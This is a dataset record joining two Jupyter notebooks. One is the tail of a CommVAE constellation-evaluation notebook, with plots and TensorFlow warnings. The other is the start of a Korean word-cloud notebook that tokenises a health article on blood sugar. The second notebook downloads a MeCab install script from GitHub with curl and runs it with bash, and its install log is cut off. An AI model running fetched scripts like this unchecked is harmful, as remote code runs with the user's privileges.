The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6384783 Model: 2.6384783 1.5517368648999994 1.0957648563644093 Pilots : [0.81216967 0.81216967]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317084702.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6685238 Model: 2.6685238 1.5216460057223005 1.152507653211039 Pilots : [0.81678084 0.81678084]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317085104.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.636464 Model: 2.636464 1.5419339571274104 1.108894730346206 Pilots : [0.81185961 0.81185961]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317085511.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6485445 Model: 2.6485445 1.5415834580217114 1.1144823615144064 Pilots : [0.81371748 0.81371748]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317085916.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6519542 Model: 2.6519542 1.5648475602360856 1.0829837519665566 Pilots : [0.81424108 0.81424108]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317090328.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6700811 Model: 2.6700811 1.5214984204669404 1.153403984218854 Pilots : [0.81701915 0.81701915]\n" ] ], [ [ "Plot $E_n$ distribution", "_____no_output_____" ] ], [ [ "# colors = cycle(['b', 'g', 'r', 'c', 'm', 'y'])\n# plt.figure(figsize=(8,6))\n# selected_max_en = []\n# for (model_exp,density_data) in results.items():\n# d = np.array([ en for (_,en) in density_data.items() ])\n# # if np.max(d) < 1.4*qam_en: # Avoid un-necessary models\n# plt.hist(d, bins=100, cumulative=True, histtype=\"step\", label=model_exp, \n# color=next(colors), linewidth=2, linestyle=\":\" if \"Oshea\" in model_exp else \"-\")\n# selected_max_en.append(np.max(d)) if np.max(d) < 1.5*qam_en else None\n# print(model_exp, \" Min:\", np.min(d), \" Max:\", np.max(d))\n# plt.xlim([0.95*agrell_en,np.max(selected_max_en)*1.05])\n# plt.plot([qam_en,qam_en], [0,100], linewidth=6, label=\"QAM\", color=next(colors), linestyle=\":\")\n# plt.plot([agrell_en,agrell_en], [0,100], linewidth=6, label=\"Agrell\", color=next(colors), linestyle=\":\")\n# plt.grid()\n# plt.legend(loc='upper left', prop={'size':14})\n# plt.title(\"Packing Density for ({},{})\".format(blkSize,chDim), fontdict={'fontsize':18})\n# plt.xlabel(\"$E_n$\", fontdict={'fontsize':16})\n# plt.ylabel(\"Distribution\", fontdict={'fontsize':16})\n# plt.savefig(\"output.eps\", format='eps', bbox_inches='tight')\n\n# colors = cycle(['b', 'g', 'c', 'r', 'm', 'y'])\ncolors = cycle(['c', 'r', 'm', 'y', 'b', 'g'])\n# plt.figure(figsize=(8,6))\nplt.figure(figsize=(4*1.5,3*1.5))\n# plt.plot([qam_en,qam_en], [0,1], linewidth=3, label=\"QAM\", color=next(colors), linestyle=\"-.\")\n# plt.plot([agrell_en,agrell_en], [0,1], linewidth=3, label=\"[9]\", color=next(colors), linestyle=\"-.\")\nselected_max_en = []\nfor (model_exp,density_data) in results.items():\n d = np.array([ en for (_,en) in density_data.items() ])\n# if np.max(d) < 1.4*qam_en: # 
Avoid un-necessary models\n plt.hist(d, bins=100, cumulative=True, density=True, histtype=\"step\", label=model_exp, \n color=next(colors), linewidth=2, linestyle=\":\" if \"Oshea\" in model_exp or \"[1]\" in model_exp else \"-\")\n selected_max_en.append(np.max(d)) if np.max(d) < 1.5*qam_en else None\n print(model_exp, \" Min:\", np.min(d), \" Max:\", np.max(d))\nplt.xlim([0.95*agrell_en,np.max(selected_max_en)*1.05])\nplt.grid()\nplt.legend(loc='upper left', prop={'size':14})\n# plt.title(\"Packing Density for ({},{})\".format(blkSize,chDim), fontdict={'fontsize':18})\nplt.xlabel(\"$E_n$\", fontdict={'fontsize':16})\nplt.ylabel(\"CDF\", fontdict={'fontsize':16})\nplt.savefig(\"output_rbf_en_{:02d}x{:02d}.pdf\".format(blkSize,chDim), format='pdf', bbox_inches='tight')\nplt.savefig(\"output_rbf_en_{:02d}x{:02d}.eps\".format(blkSize,chDim), format='eps', bbox_inches='tight')", "[1] Min: 1.0957113758453254 Max: 1.4242162083206868\nProposed: Trained with (19) Min: 0.9442138580261565 Max: 1.1523691471870963\nProposed: Trained with (23) Min: 1.0544938823083154 Max: 1.2040457387710786\n" ] ], [ [ "Plot constellation for best models", "_____no_output_____" ] ], [ [ "for (model_exp,density_data) in results.items():\n file_prefix = model_summary[model_exp].split(\"_summary.dil\")[0]\n modelid = min(density_data, key=density_data.get)\n config_file = file_prefix + \"_\" + modelid + \".dil\"\n config = {}\n model = None\n with open(config_file, \"rb\") as cfg_file:\n config = dill.load(cfg_file)\n if 'obj_fn' in config: # obj_fn is there only for proposed CommVAE\n model = CommVAE1hot()\n else:\n model = AEOshea1hot()\n model.load_model(file_prefix+\"_\"+modelid)\n # Compute TX Map\n dl_map = model.encode(one_hot_code)\n max_mag = np.max(np.abs(dl_map))\n tick_points = [ -1.1*max_mag, 0.0, +1.1*max_mag ]\n # Plot TX Map\n fig, ax = plt.subplots(1, chDim, figsize=(5*chDim,4.5))\n for i in range(chDim):\n _ax = ax if chDim==1 else ax[i]\n 
_ax.scatter(dl_map[:,i],dl_map[:,i+chDim],c=np.arange(inVecDim))\n for j in range(inVecDim):\n _ax.annotate( j, (dl_map[j,i],dl_map[j,i+chDim]) )\n _ax.set_title( \"Channel Use {}\".format(i+1) )\n _ax.grid()\n _ax.set_xticks(tick_points)\n _ax.set_yticks(tick_points)\n _ax.set_aspect('equal')\n fig.suptitle(\"{} $E_n={:5.4f}$\".format(model_exp,density_data[modelid]), fontsize=16)\n \n # Clear Session and Model\n K.clear_session()\n del model\n \n# Plot QAM Model\nfig, ax = plt.subplots(1, chDim, figsize=(5*chDim,4.5))\nmax_mag = np.max(np.abs(qam_map))\ntick_points = [ -1.1*max_mag, 0.0, +1.1*max_mag ] \nfor i in range(chDim):\n _ax = ax if chDim==1 else ax[i]\n _ax.scatter(qam_map[:,2*i], qam_map[:,2*i+1], c=np.arange(inVecDim))\n for j in range(inVecDim):\n _ax.annotate( j, (qam_map[j,2*i],qam_map[j,2*i+1]) )\n _ax.set_title( \"Channel Use {}\".format(i+1) )\n _ax.grid()\n _ax.set_xticks(tick_points)\n _ax.set_yticks(tick_points)\n _ax.set_aspect('equal')\nfig.suptitle(\"{} $E_n={:5.4f}$\".format(\"QAM\",qam_en), fontsize=16)\n\n# Plot Agrell Model\nfig, ax = plt.subplots(1, chDim, figsize=(5*chDim,4.5))\nmax_mag = np.max(np.abs(agrell_map))\ntick_points = [ -1.1*max_mag, 0.0, +1.1*max_mag ] \nfor i in range(chDim):\n _ax = ax if chDim==1 else ax[i]\n _ax.scatter(agrell_map[:,2*i], agrell_map[:,2*i+1], c=np.arange(inVecDim))\n for j in range(inVecDim):\n _ax.annotate( j, (agrell_map[j,2*i],agrell_map[j,2*i+1]) )\n _ax.set_title( \"Channel Use {}\".format(i+1) )\n _ax.grid()\n _ax.set_xticks(tick_points)\n _ax.set_yticks(tick_points)\n _ax.set_aspect('equal')\nfig.suptitle(\"{} $E_n={:5.4f}$\".format(\"Agrell\",agrell_en), fontsize=16)", "WARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72e21a36b7d9c26c06ce10242fb387fff4f8fc4
335,474
ipynb
Jupyter Notebook
wordcloud.ipynb
tecktonik08/test_deeplearning
30edbb642ba0eb8688fc5af3a3c63c71b4045e4f
[ "Apache-2.0" ]
null
null
null
wordcloud.ipynb
tecktonik08/test_deeplearning
30edbb642ba0eb8688fc5af3a3c63c71b4045e4f
[ "Apache-2.0" ]
null
null
null
wordcloud.ipynb
tecktonik08/test_deeplearning
30edbb642ba0eb8688fc5af3a3c63c71b4045e4f
[ "Apache-2.0" ]
null
null
null
177.124604
208,966
0.785304
[ [ [ "!pip install wordcloud", "Requirement already satisfied: wordcloud in /usr/local/lib/python3.7/dist-packages (1.5.0)\nRequirement already satisfied: numpy>=1.6.1 in /usr/local/lib/python3.7/dist-packages (from wordcloud) (1.19.5)\nRequirement already satisfied: pillow in /usr/local/lib/python3.7/dist-packages (from wordcloud) (7.1.2)\n" ], [ "!python -m pip install konlpy", "Collecting konlpy\n Downloading konlpy-0.5.2-py2.py3-none-any.whl (19.4 MB)\n\u001b[K |████████████████████████████████| 19.4 MB 1.3 MB/s \n\u001b[?25hCollecting colorama\n Downloading colorama-0.4.4-py2.py3-none-any.whl (16 kB)\nRequirement already satisfied: tweepy>=3.7.0 in /usr/local/lib/python3.7/dist-packages (from konlpy) (3.10.0)\nCollecting JPype1>=0.7.0\n Downloading JPype1-1.3.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl (448 kB)\n\u001b[K |████████████████████████████████| 448 kB 47.3 MB/s \n\u001b[?25hRequirement already satisfied: numpy>=1.6 in /usr/local/lib/python3.7/dist-packages (from konlpy) (1.19.5)\nRequirement already satisfied: lxml>=4.1.0 in /usr/local/lib/python3.7/dist-packages (from konlpy) (4.2.6)\nCollecting beautifulsoup4==4.6.0\n Downloading beautifulsoup4-4.6.0-py3-none-any.whl (86 kB)\n\u001b[K |████████████████████████████████| 86 kB 6.1 MB/s \n\u001b[?25hRequirement already satisfied: typing-extensions in /usr/local/lib/python3.7/dist-packages (from JPype1>=0.7.0->konlpy) (3.7.4.3)\nRequirement already satisfied: requests-oauthlib>=0.7.0 in /usr/local/lib/python3.7/dist-packages (from tweepy>=3.7.0->konlpy) (1.3.0)\nRequirement already satisfied: six>=1.10.0 in /usr/local/lib/python3.7/dist-packages (from tweepy>=3.7.0->konlpy) (1.15.0)\nRequirement already satisfied: requests[socks]>=2.11.1 in /usr/local/lib/python3.7/dist-packages (from tweepy>=3.7.0->konlpy) (2.23.0)\nRequirement already satisfied: oauthlib>=3.0.0 in /usr/local/lib/python3.7/dist-packages (from requests-oauthlib>=0.7.0->tweepy>=3.7.0->konlpy) (3.1.1)\nRequirement already 
satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests[socks]>=2.11.1->tweepy>=3.7.0->konlpy) (3.0.4)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests[socks]>=2.11.1->tweepy>=3.7.0->konlpy) (1.24.3)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests[socks]>=2.11.1->tweepy>=3.7.0->konlpy) (2.10)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests[socks]>=2.11.1->tweepy>=3.7.0->konlpy) (2021.5.30)\nRequirement already satisfied: PySocks!=1.5.7,>=1.5.6 in /usr/local/lib/python3.7/dist-packages (from requests[socks]>=2.11.1->tweepy>=3.7.0->konlpy) (1.7.1)\nInstalling collected packages: JPype1, colorama, beautifulsoup4, konlpy\n Attempting uninstall: beautifulsoup4\n Found existing installation: beautifulsoup4 4.6.3\n Uninstalling beautifulsoup4-4.6.3:\n Successfully uninstalled beautifulsoup4-4.6.3\nSuccessfully installed JPype1-1.3.0 beautifulsoup4-4.6.0 colorama-0.4.4 konlpy-0.5.2\n" ], [ "from wordcloud import WordCloud\nimport matplotlib.pyplot as plt", "_____no_output_____" ], [ "article ='''살이 찌고 혈당이 오르는 이유는 간단하다. 많이 먹고 움직이지 않기 때문이다. 심지어 식사 후 바로 누워 자는 사람도 있다. 살을 빼고 혈당을 관리하려면 \"먹었으면 움직여라\"는 말을 새겨들을 필요가 있다. 일상생활에서 혈당을 내리고 다이어트에 좋은 습관에 대해 알아보자.\n\n◆ 음식 먹으면 올라가는 혈당.. 당뇨병 예방-관리에 비상\n\n혈액 속에 포함된 당(포도당)의 농도가 바로 혈당이다. 음식을 먹으면 포도당이 만들어지고 인슐린과 글루카곤, 두 가지 물질에 의해 조절된다. 혈당은 식후에 올라가고 공복 상태가 되면 떨어진다. 많이 먹고 잘 움직이질 않으면 혈당 조절을 하는 인슐린의 분비가 제대로 이뤄지지 않는다. 혈당이 높아지면 당뇨병 위험이 커진다. 당뇨병에 걸리면 완치가 없다. 평생 관리해야 한다. 심장병(협심증, 심근경색)이나 뇌졸중(뇌출혈, 뇌경색) 등 혈관 질환 위험이 높아진다.\n\n◆ 식후 입가심으로 케이크?\n\n식사를 한 뒤 케이크를 먹는 경우가 있다. 하지만 설탕, 꿀, 물엿, 시럽, 초콜릿, 사탕, 탄산음료 등 단순당이 많이 함유된 식품은 혈당을 급격하게 올릴 수 있다. 대한당뇨병학회에 따르면 단순당은 농축된 열량원이기 때문에 소화흡수가 빨라 혈당을 급속히 높일 수 있다. 아침 공복에 운동을 하다 저혈당에 빠진 당뇨병 환자가 급하게 당이 든 음식을 찾는 것도 혈당을 빠르게 올려야 하기 때문이다.\n\n◆ 과일은 식후에 먹는다? \"식전에 드셔 보세요\"\n\n식사 후에 과일을 먹는 것이 일상화되어 있다. 
하지만 혈당 관리에는 좋지 않다. 오히려 식사 전에 먹으면 과식을 막고 혈당 조절에도 도움이 된다. 잘 익은 과일, 단 맛이 강한 과일은 당지수가 높다. 평소 혈당이 높은 사람은 열대과일 등 단 과일을 피해야 한다. 건강한 사람이라도 단 과일을 과식하지 않는 게 좋다. 과일도 많이 먹으면 혈당을 올리고 살이 찔 우려가 있다. 사과는 3분의 1쪽, 바나나는 반 개 정도가 좋다. 토마토처럼 당도가 비교적 낮고 수분함량이 높은 채소나 과일은 작은 크기 2개를 먹어도 된다.\n\n◆ 닭 칼국수, 콩국수가 혈당 관리에 좋은 이유\n\n밥, 빵, 떡, 국수 같은 탄수화물은 음식은 당지수가 높아 혈당을 빨리 올린다. 이런 음식들은 혈당을 천천히 올리는 살코기(쇠고기, 돼지고기, 닭고기 등), 생선 같은 단백질과 함께 먹으면 혈당 상승을 느리게 할 수 있다. 닭 가슴살이 든 칼국수나 콩 단백질이 풍부한 콩국수도 도움이 된다. 콩은 포도당이나 콜레스테롤의 흡수를 지연시켜 혈당이 서서히 오르게 한다.\n\n◆ 식초는 맛? \"건강효과 따로 있어요\"\n\n식초는 시큼한 맛 뿐 아니라 혈당 조절에 효과를 낸다. 혈당을 천천히 올리기 때문에 음식물에 넣어 먹으면 건강에 좋다. 짜장면을 먹을 때 단무지에 식초를 뿌리면 혈당 조절에 도움이 될 수 있다. 늘 밥에 곁들이는 나물을 만들 때도 식초를 활용해보자. 탄수화물이 많은 밥이 혈당 상승을 주도하는 것을 줄일 수 있다.\n\n◆ \"식사 후 몸을 꼭 움직이세요\"\n\n운동은 칼로리를 소모시키고 혈당을 직접적으로 떨어뜨린다. 이미 당뇨병이 있다면 혈관 질환 등 합병증을 예방한다. 아침 식사 후 대중교통을 이용하면 걷기, 계단 오르기 등 운동을 할 수 있다. 하지만 점심, 저녁 식사 후가 문제다. 혈당이 가장 높아지는 시간은 식후 30분~1시간 사이다. 따라서 운동의 최적 시기는 식후 30분~1시간 이후라고 할 수 있다. 직장인은 의자에 앉기 보다는 가급적 서서 업무를 보거나 복도를 걷는 것이 좋다.\n\n◆ 식후 바로 눕는 것은 최악.. 걷기가 최선\n\n식사 후 바로 눕는 것은 최악이다. 입속으로 신물이 올라오는 위식도역류질환 위험도 높아진다. 걷기가 가장 좋지만 거실이나 방을 어슬렁거려도 좋다. 30분 정도 몸을 움직이면 혈당을 내리고 소화에도 큰 도움이 된다. 당뇨병에 좋은 운동은 숨이 조금 찰 정도의 강도로 하루에 30∼60분 가량, 일주일에 3~4차례는 해야 한다. 무리한 운동보다는 빠르게 걷기, 자전거 타기 등이 좋다. 
무엇보다 중요한 것은 \"먹었으면 움직여라\"는 말을 실천하는 것이다.\n.'''", "_____no_output_____" ], [ "type(article) # 스크래핑한 자료를 받을 때의 타입에 따라 앞부분이 달라질 수 있음", "_____no_output_____" ] ], [ [ "명사와 조사를 분리하고 조사와 필요없는 단어를 stopword에 넣어 제거하는 것이 필요", "_____no_output_____" ] ], [ [ "import konlpy", "_____no_output_____" ], [ "okt = konlpy.tag.Okt()", "_____no_output_____" ], [ "stopwords = ['의','가','이','은','들','는','좀','잘','걍','과','도','를','으로','자','에','와','한','하다']", "_____no_output_____" ], [ "!curl -O https://raw.githubusercontent.com/konlpy/konlpy/master/scripts/mecab.sh", " % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n\r 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r100 5064 100 5064 0 0 49165 0 --:--:-- --:--:-- --:--:-- 49165\n" ], [ "!bash ./mecab.sh", "Installing automake (A dependency for mecab-ko)\nGet:1 http://security.ubuntu.com/ubuntu bionic-security InRelease [88.7 kB]\nGet:2 https://cloud.r-project.org/bin/linux/ubuntu bionic-cran40/ InRelease [3,626 B]\nIgn:3 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 InRelease\nGet:4 http://ppa.launchpad.net/c2d4u.team/c2d4u4.0+/ubuntu bionic InRelease [15.9 kB]\nHit:5 http://archive.ubuntu.com/ubuntu bionic InRelease\nIgn:6 https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 InRelease\nGet:7 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 Release [697 B]\nHit:8 https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 Release\nGet:9 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 Release.gpg [836 B]\nGet:10 https://cloud.r-project.org/bin/linux/ubuntu bionic-cran40/ Packages [62.9 kB]\nGet:11 http://archive.ubuntu.com/ubuntu bionic-updates InRelease [88.7 kB]\nGet:12 http://security.ubuntu.com/ubuntu bionic-security/restricted amd64 Packages [510 kB]\nHit:13 http://ppa.launchpad.net/cran/libgit2/ubuntu bionic InRelease\nGet:14 
http://security.ubuntu.com/ubuntu bionic-security/universe amd64 Packages [1,420 kB]\nGet:15 http://security.ubuntu.com/ubuntu bionic-security/multiverse amd64 Packages [26.7 kB]\nGet:16 http://security.ubuntu.com/ubuntu bionic-security/main amd64 Packages [2,263 kB]\nGet:17 http://archive.ubuntu.com/ubuntu bionic-backports InRelease [74.6 kB]\nGet:18 http://ppa.launchpad.net/deadsnakes/ppa/ubuntu bionic InRelease [15.9 kB]\nGet:20 http://ppa.launchpad.net/graphics-drivers/ppa/ubuntu bionic InRelease [21.3 kB]\nIgn:21 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 Packages\nGet:21 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 Packages [695 kB]\nGet:22 http://ppa.launchpad.net/c2d4u.team/c2d4u4.0+/ubuntu bionic/main Sources [1,786 kB]\nGet:23 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages [2,699 kB]\nGet:24 http://archive.ubuntu.com/ubuntu bionic-updates/multiverse amd64 Packages [39.4 kB]\nGet:25 http://archive.ubuntu.com/ubuntu bionic-updates/restricted amd64 Packages [544 kB]\nGet:26 http://archive.ubuntu.com/ubuntu bionic-updates/universe amd64 Packages [2,195 kB]\nGet:27 http://ppa.launchpad.net/c2d4u.team/c2d4u4.0+/ubuntu bionic/main amd64 Packages [914 kB]\nGet:28 http://ppa.launchpad.net/deadsnakes/ppa/ubuntu bionic/main amd64 Packages [40.9 kB]\nGet:29 http://ppa.launchpad.net/graphics-drivers/ppa/ubuntu bionic/main amd64 Packages [44.1 kB]\nFetched 13.6 MB in 3s (4,410 kB/s)\nReading package lists... Done\nReading package lists... Done\nBuilding dependency tree \nReading state information... 
Done\nThe following additional packages will be installed:\n autoconf autotools-dev libsigsegv2 m4\nSuggested packages:\n autoconf-archive gnu-standards autoconf-doc libtool gettext m4-doc\nThe following NEW packages will be installed:\n autoconf automake autotools-dev libsigsegv2 m4\n0 upgraded, 5 newly installed, 0 to remove and 100 not upgraded.\nNeed to get 1,082 kB of archives.\nAfter this operation, 3,994 kB of additional disk space will be used.\nGet:1 http://archive.ubuntu.com/ubuntu bionic/main amd64 libsigsegv2 amd64 2.12-1 [14.7 kB]\nGet:2 http://archive.ubuntu.com/ubuntu bionic/main amd64 m4 amd64 1.4.18-1 [197 kB]\nGet:3 http://archive.ubuntu.com/ubuntu bionic/main amd64 autoconf all 2.69-11 [322 kB]\nGet:4 http://archive.ubuntu.com/ubuntu bionic/main amd64 autotools-dev all 20180224.1 [39.6 kB]\nGet:5 http://archive.ubuntu.com/ubuntu bionic/main amd64 automake all 1:1.15.1-3ubuntu2 [509 kB]\nFetched 1,082 kB in 1s (1,371 kB/s)\ndebconf: unable to initialize frontend: Dialog\ndebconf: (No usable dialog-like program is installed, so the dialog based frontend cannot be used. at /usr/share/perl5/Debconf/FrontEnd/Dialog.pm line 76, <> line 5.)\ndebconf: falling back to frontend: Readline\ndebconf: unable to initialize frontend: Readline\ndebconf: (This frontend requires a controlling tty.)\ndebconf: falling back to frontend: Teletype\ndpkg-preconfigure: unable to re-open stdin: \nSelecting previously unselected package libsigsegv2:amd64.\n(Reading database ... 
160837 files and directories currently installed.)\nPreparing to unpack .../libsigsegv2_2.12-1_amd64.deb ...\nUnpacking libsigsegv2:amd64 (2.12-1) ...\nSelecting previously unselected package m4.\nPreparing to unpack .../archives/m4_1.4.18-1_amd64.deb ...\nUnpacking m4 (1.4.18-1) ...\nSelecting previously unselected package autoconf.\nPreparing to unpack .../autoconf_2.69-11_all.deb ...\nUnpacking autoconf (2.69-11) ...\nSelecting previously unselected package autotools-dev.\nPreparing to unpack .../autotools-dev_20180224.1_all.deb ...\nUnpacking autotools-dev (20180224.1) ...\nSelecting previously unselected package automake.\nPreparing to unpack .../automake_1%3a1.15.1-3ubuntu2_all.deb ...\nUnpacking automake (1:1.15.1-3ubuntu2) ...\nSetting up libsigsegv2:amd64 (2.12-1) ...\nSetting up m4 (1.4.18-1) ...\nSetting up autotools-dev (20180224.1) ...\nSetting up autoconf (2.69-11) ...\nSetting up automake (1:1.15.1-3ubuntu2) ...\nupdate-alternatives: using /usr/bin/automake-1.15 to provide /usr/bin/automake (automake) in auto mode\nProcessing triggers for libc-bin (2.27-3ubuntu1.2) ...\n/sbin/ldconfig.real: /usr/local/lib/python3.7/dist-packages/ideep4py/lib/libmkldnn.so.0 is not a symbolic link\n\nProcessing triggers for man-db (2.8.3-2ubuntu0.1) ...\nInstall mecab-ko-dic\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\n100 1381k 100 1381k 0 0 6141k 0 --:--:-- --:--:-- --:--:-- 
6141k\nmecab-0.996-ko-0.9.2/\nmecab-0.996-ko-0.9.2/example/\nmecab-0.996-ko-0.9.2/example/example.cpp\nmecab-0.996-ko-0.9.2/example/example_lattice.cpp\nmecab-0.996-ko-0.9.2/example/example_lattice.c\nmecab-0.996-ko-0.9.2/example/example.c\nmecab-0.996-ko-0.9.2/example/thread_test.cpp\nmecab-0.996-ko-0.9.2/mecab-config.in\nmecab-0.996-ko-0.9.2/man/\nmecab-0.996-ko-0.9.2/man/Makefile.am\nmecab-0.996-ko-0.9.2/man/mecab.1\nmecab-0.996-ko-0.9.2/man/Makefile.in\nmecab-0.996-ko-0.9.2/mecab.iss.in\nmecab-0.996-ko-0.9.2/config.guess\nmecab-0.996-ko-0.9.2/README\nmecab-0.996-ko-0.9.2/COPYING\nmecab-0.996-ko-0.9.2/CHANGES.md\nmecab-0.996-ko-0.9.2/README.md\nmecab-0.996-ko-0.9.2/INSTALL\nmecab-0.996-ko-0.9.2/config.sub\nmecab-0.996-ko-0.9.2/configure.in\nmecab-0.996-ko-0.9.2/swig/\nmecab-0.996-ko-0.9.2/swig/Makefile\nmecab-0.996-ko-0.9.2/swig/version.h.in\nmecab-0.996-ko-0.9.2/swig/version.h\nmecab-0.996-ko-0.9.2/swig/MeCab.i\nmecab-0.996-ko-0.9.2/aclocal.m4\nmecab-0.996-ko-0.9.2/LGPL\nmecab-0.996-ko-0.9.2/Makefile.am\nmecab-0.996-ko-0.9.2/configure\nmecab-0.996-ko-0.9.2/tests/\nmecab-0.996-ko-0.9.2/tests/autolink/\nmecab-0.996-ko-0.9.2/tests/autolink/unk.def\nmecab-0.996-ko-0.9.2/tests/autolink/dicrc\nmecab-0.996-ko-0.9.2/tests/autolink/dic.csv\nmecab-0.996-ko-0.9.2/tests/autolink/test\nmecab-0.996-ko-0.9.2/tests/autolink/char.def\nmecab-0.996-ko-0.9.2/tests/autolink/matrix.def\nmecab-0.996-ko-0.9.2/tests/autolink/test.gld\nmecab-0.996-ko-0.9.2/tests/t9/\nmecab-0.996-ko-0.9.2/tests/t9/unk.def\nmecab-0.996-ko-0.9.2/tests/t9/ipadic.pl\nmecab-0.996-ko-0.9.2/tests/t9/dicrc\nmecab-0.996-ko-0.9.2/tests/t9/dic.csv\nmecab-0.996-ko-0.9.2/tests/t9/test\nmecab-0.996-ko-0.9.2/tests/t9/char.def\nmecab-0.996-ko-0.9.2/tests/t9/matrix.def\nmecab-0.996-ko-0.9.2/tests/t9/mkdic.pl\nmecab-0.996-ko-0.9.2/tests/t9/test.gld\nmecab-0.996-ko-0.9.2/tests/cost-train/\nmecab-0.996-ko-0.9.2/tests/cost-train/ipa.train\nmecab-0.996-ko-0.9.2/tests/cost-train/ipa.test\nmecab-0.996-ko-0.9.2/tests/cost-train/s
eed/\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/rewrite.def\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/feature.def\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/unk.def\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/dicrc\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/dic.csv\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/char.def\nmecab-0.996-ko-0.9.2/tests/cost-train/seed/matrix.def\nmecab-0.996-ko-0.9.2/tests/run-eval.sh\nmecab-0.996-ko-0.9.2/tests/run-cost-train.sh\nmecab-0.996-ko-0.9.2/tests/Makefile.am\nmecab-0.996-ko-0.9.2/tests/katakana/\nmecab-0.996-ko-0.9.2/tests/katakana/unk.def\nmecab-0.996-ko-0.9.2/tests/katakana/dicrc\nmecab-0.996-ko-0.9.2/tests/katakana/dic.csv\nmecab-0.996-ko-0.9.2/tests/katakana/test\nmecab-0.996-ko-0.9.2/tests/katakana/char.def\nmecab-0.996-ko-0.9.2/tests/katakana/matrix.def\nmecab-0.996-ko-0.9.2/tests/katakana/test.gld\nmecab-0.996-ko-0.9.2/tests/eval/\nmecab-0.996-ko-0.9.2/tests/eval/answer\nmecab-0.996-ko-0.9.2/tests/eval/system\nmecab-0.996-ko-0.9.2/tests/eval/test.gld\nmecab-0.996-ko-0.9.2/tests/shiin/\nmecab-0.996-ko-0.9.2/tests/shiin/unk.def\nmecab-0.996-ko-0.9.2/tests/shiin/dicrc\nmecab-0.996-ko-0.9.2/tests/shiin/dic.csv\nmecab-0.996-ko-0.9.2/tests/shiin/test\nmecab-0.996-ko-0.9.2/tests/shiin/char.def\nmecab-0.996-ko-0.9.2/tests/shiin/matrix.def\nmecab-0.996-ko-0.9.2/tests/shiin/mkdic.pl\nmecab-0.996-ko-0.9.2/tests/shiin/test.gld\nmecab-0.996-ko-0.9.2/tests/latin/\nmecab-0.996-ko-0.9.2/tests/latin/unk.def\nmecab-0.996-ko-0.9.2/tests/latin/dicrc\nmecab-0.996-ko-0.9.2/tests/latin/dic.csv\nmecab-0.996-ko-0.9.2/tests/latin/test\nmecab-0.996-ko-0.9.2/tests/latin/char.def\nmecab-0.996-ko-0.9.2/tests/latin/matrix.def\nmecab-0.996-ko-0.9.2/tests/latin/test.gld\nmecab-0.996-ko-0.9.2/tests/chartype/\nmecab-0.996-ko-0.9.2/tests/chartype/unk.def\nmecab-0.996-ko-0.9.2/tests/charty